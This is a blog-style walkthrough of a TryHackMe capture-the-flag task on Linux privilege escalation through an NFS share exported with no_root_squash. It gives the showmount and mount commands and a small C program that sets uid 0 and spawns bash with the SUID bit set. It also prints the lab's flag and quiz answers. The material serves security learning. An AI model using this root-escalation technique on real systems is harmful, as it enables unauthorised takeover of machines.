This article discusses the solution for TryHackMe's Linux Privilege Escalation SUID task so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Privilege Escalation: NFS (Network File Sharing) Solution
Notes:
SSH and Telnet can be used for root access.
- Can find SSH private key in target system to connect with root privilege
Misconfigured network shell.
- can be present when network backup exist.
NFS configuration in
/etc/exports/
Look for no_root_squash on writable share as will allow creation of executable with SUID bit set and execute on target system.
- By default NFS will remove root privileges from any file by changing root user to nfsnobody.
How many mountable shares can you identify on the target system?
Run the following command in attacke machine:
showmount -e {target_machine ip}
Answer: 3
How many shares have the "no_root_squash" option enabled?
Run
cat /etc/exports
on the target machine
Answer: 3
What is the content of the flag7.txt file?
- Let's mount one of the mountable shares by executing the following on attack machine:
mkdir /tmp/backupsharemounted
mount -o rw 10.10.139.175:/home/ubuntu/sharedfolder /tmp/backupsharemounted
cd /tmp/backupsharemounted
touch attack.c
- Let's update
attack.c
to executebin/bash
on the attack machine.
int main()
{setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}
- Execute the following on the attack machine
gcc attack.c -o attack -w
chmod +s attack
- On target machine
cd /home/ubuntu/sharedfolder
and you will see the attack executable file.
- Execute
./attack
on the target machine and this will provide us with bash root privileges.
- Run
cat /home/matt/flag7.txt
on the target machine
Answer:THM-89384012
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarily Buy Me A Coffeei f you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)